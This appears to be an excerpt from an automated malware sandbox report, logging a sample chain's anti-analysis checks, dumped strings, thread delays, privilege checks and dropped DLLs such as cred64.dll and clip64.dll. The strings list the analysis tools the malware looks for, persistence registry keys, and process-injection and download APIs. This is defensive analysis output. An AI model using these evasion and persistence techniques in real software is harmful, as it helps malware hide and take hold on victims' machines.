Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: PROCESSHACKER.EXE
Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: PROCMON.EXE
Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: X64DBG.EXE
Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: AUTORUNS.EXE
Source: msiexec.exe, 0000002B.00000002.2631070003.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmp	Binary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: IDAQ.EXE
Source: update.exe, 00000028.00000003.2629166236.0000000003470000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: HZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEX

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Memory allocated: EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Memory allocated: 48D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Memory allocated: 3430000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Memory allocated: 1800000 memory reserve \| memory write watch

Source: C:\Windows\explorer.exe

Code function: 4_2_098288B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,

4_2_098288B0

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\audiodg.exe	Window / User API: threadDelayed 1035	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3155	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6693	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 732	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Window / User API: threadDelayed 4596	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Window / User API: threadDelayed 5009	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Window / User API: threadDelayed 1118
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 901
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1724
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1493
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Window / User API: threadDelayed 465

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\python38.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_lzma.pyd	Jump to dropped file

Source: C:\Windows\System32\svchost.exe

Evaded block: after key decision

graph_1-848

Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_6-1192
Source: C:\Windows\System32\audiodg.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_8-1136
Source: C:\Windows\System32\msiexec.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_9-1150
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-1137
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_11-17895
Source: C:\Windows\System32\svchost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_1-1135

Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	API coverage: 1.7 %
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	API coverage: 6.1 %

Source: C:\Windows\System32\audiodg.exe TID: 2428	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 2428	Thread sleep count: 1035 > 30	Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 2428	Thread sleep time: -51750000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 2576	Thread sleep count: 80 > 30	Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 2576	Thread sleep time: -216000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\audiodg.exe TID: 2428	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 4368	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 4368	Thread sleep count: 1026 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 4368	Thread sleep time: -51300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 4024	Thread sleep count: 75 > 30	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 4024	Thread sleep time: -202500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 4368	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6348	Thread sleep time: -2997250s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5548	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6348	Thread sleep time: -6358350s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe TID: 4568	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 5032	Thread sleep time: -33540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 3572	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6752	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 5032	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1776	Thread sleep count: 901 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1776	Thread sleep time: -901000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7100	Thread sleep count: 830 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7100	Thread sleep time: -830000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep count: 7828 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep count: 1724 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 940	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe TID: 748	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\audiodg.exe	Last function: Thread delayed
Source: C:\Windows\System32\audiodg.exe	Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe	Last function: Thread delayed
